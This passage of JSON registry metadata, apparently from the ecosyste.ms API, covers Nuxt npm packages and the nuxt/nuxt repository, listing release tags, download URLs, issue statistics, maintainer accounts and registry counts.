/github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T20:44:23.060Z","dependent_packages_count":13,"downloads":590023,"downloads_period":"last-month","dependent_repos_count":56778,"rankings":{"downloads":0.24505650528528258,"dependent_repos_count":0.12621152278151598,"dependent_packages_count":1.6674475587966937,"stargazers_count":0.15447521562107158,"forks_count":0.5200789827399681,"docker_downloads_count":0.4437801426250028,"average":0.5261749879749225},"purl":"pkg:npm/%40nuxt/core","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/core","docker_dependents_count":259,"docker_downloads_count":1376808,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/core","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/core/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fcore/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T01:59:31.910Z","updated_at":"2022-11-20T01:59:31.910Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T01:59:31.890Z","updated_at":"2022-11-20T01:59:31.890Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T01:59:31.901Z","updated_at":"2022-11-20T01:59:31.901Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-20T01:59:31.925Z","updated_at":"2022-11-20T01:59:31.925Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:27:07.325Z","updated_at":"2023-08-19T18:27:07.325Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8418109,"name":"@nuxt/webpack-builder-nightly","ecosystem":"npm","description":"Webpack bundler for Nuxt","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1171,"first_release_published_at":"2023-10-12T12:21:19.501Z","latest_release_published_at":"2023-10-12T12:21:19.501Z","latest_release_number":"0.0.0","last_synced_at":"2026-03-31T20:01:23.638Z","created_at":"2023-10-12T12:25:11.770Z","updated_at":"2026-03-31T20:01:23.639Z","registry_url":"https://www.npmjs.com/package/@nuxt/webpack-builder-nightly","install_command":"npm install @nuxt/webpack-builder-nightly","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"pr-22649":"3.9.0-28354214.15a5e77d","pr-24010":"3.9.0-28378645.e9794ea0","pr-24787":"3.9.0-28378659.75a82c63","pr-24922":"3.10.0-28394973.15b95165","pr-24894":"3.10.0-28404855.4f7de5af","pr-23368":"3.10.0-28412264.57594fa2","pr-25210":"3.10.0-28422040.922a0429","pr-24960":"3.9.2-28423518.40bfb173","pr-25071":"3.10.0-28425618.d0e71656","pr-25770":"3.10.2-28463758.ae976d69","pr-26085":"3.11.0-28494221.a1f9ca9e","pr-25936":"3.11.0-28508900.dcd73d30","pr-26928":"3.12.0-28567604.d4b61ffd","pr-27037":"3.12.0-28577690.5048d11c","latest":"4.0.0-28946370.cc94fd98","3x":"3.15.2-28946348.60f7d15e"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nux